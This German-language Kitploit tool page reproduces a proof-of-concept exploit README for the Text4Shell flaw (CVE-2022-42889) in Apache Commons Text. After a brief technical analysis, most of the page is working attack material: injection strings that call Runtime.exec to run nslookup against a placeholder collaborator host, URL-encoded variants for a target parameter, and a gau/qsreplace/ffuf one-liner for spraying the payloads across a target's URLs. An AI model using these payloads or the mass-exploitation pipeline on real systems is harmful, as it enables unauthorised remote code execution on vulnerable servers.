Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-42889-text4shell — Apache commons text - CVE-2022-42889 Text4Shell Proof-of-Concept-Exploit. | Kitploit
Tools/GitHubGitHub/kljunowsky/cve-2022-42889-text4shell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubkljunowsky/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Apache commons text - CVE-2022-42889 Text4Shell Proof-of-Concept-Exploit.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
578vor 2 JahrenVon Kitploit geprüft

CVE-2022-42889-text4shell 🔥🔥🔥

Apache Commons Text - CVE-2022-42889 Text4Shell Proof-of-Concept-Exploit.

Details📃

CVE-2022-42889 betrifft Apache Commons Text Versionen 1.5 bis 1.9. Der Fehler wurde ab Version 1.10 behoben.

Die Schwachstelle wird mit Log4Shell verglichen, da es sich um eine Schwachstelle auf Bibliotheksebene handelt, die wahrscheinlich eine Vielzahl von Softwareanwendungen betrifft, die das entsprechende Objekt verwenden. Eine erste Analyse zeigt jedoch, dass dies ein schlechter Vergleich ist. Die Natur der Schwachstelle bedeutet, dass es im Gegensatz zu Log4Shell selten vorkommen wird, dass eine Anwendung die verwundbare Komponente von Commons Text verwendet, um unvertraute, potenziell bösartige Eingaben zu verarbeiten.

Technische Analyse

Die Schwachstelle existiert im StringSubstitutor-Interpolator-Objekt. Ein Interpolator wird durch die Methode StringSubstitutor.createInterpolator() erstellt und ermöglicht Zeichenketten-Lookups, wie in StringLookupFactory definiert. Dies kann genutzt werden, indem eine Zeichenkette „${prefix:name}“ übergeben wird, wobei der Präfix das genannte Lookup ist. Die Verwendung der Lookups „script“, „dns“ oder „url“ würde es ermöglichen, dass eine manipulierte Zeichenkette beliebige Skripte ausführt, wenn sie an das Interpolator-Objekt übergeben wird.

Während dieses spezifische Codefragment in Produktionsanwendungen unwahrscheinlich ist, besteht die Sorge darin, dass in einigen Anwendungen die Variable pocstring angreifergesteuert sein könnte. In diesem Sinne ähnelt die Schwachstelle Log4Shell. Allerdings wird der StringSubstitutor-Interpolator deutlich seltener verwendet als die verwundbare Zeichenkettenersetzung in Log4j, und die Natur eines solchen Interpolators bedeutet, dass es weniger wahrscheinlich ist, dass manipulierte Eingaben an das verwundbare Objekt gelangen, als dass man lediglich mit einer solchen manipulierten Zeichenkette interagiert, wie bei Log4Shell.

Exploitation👨‍💻

Manuell🛠️

script:javascript

Parameterwert durch Payload ersetzen:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

url

root@kitploit:~
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Burl%3AUTF-8%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

dns

root@kitploit:~
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

Massenausbeutung ⛓️

payloads.txt

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
for payload in $(cat payloads.txt|sed 's/ COLLABORATOR-HERE/SPACEid.burpcollaborator.com/g'); do echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace "$payload" | sed 's/SPACE/%20/g' | grep "java.lang.Runtime.getRuntime" >> payloads-final.txt;done && ffuf -w payloads-final.txt -u FUZZ

Viel Spaß bei der Jagd!💸

Voraussetzungen🧰

ffuf Danke @joohoi!

qsreplace Danke @tomnomnom

gau Danke @lc

Kontakt📇

LinkedIn Twitter - Milan Jovic

LinkedIn - Milan Jovic

Tool herunterladen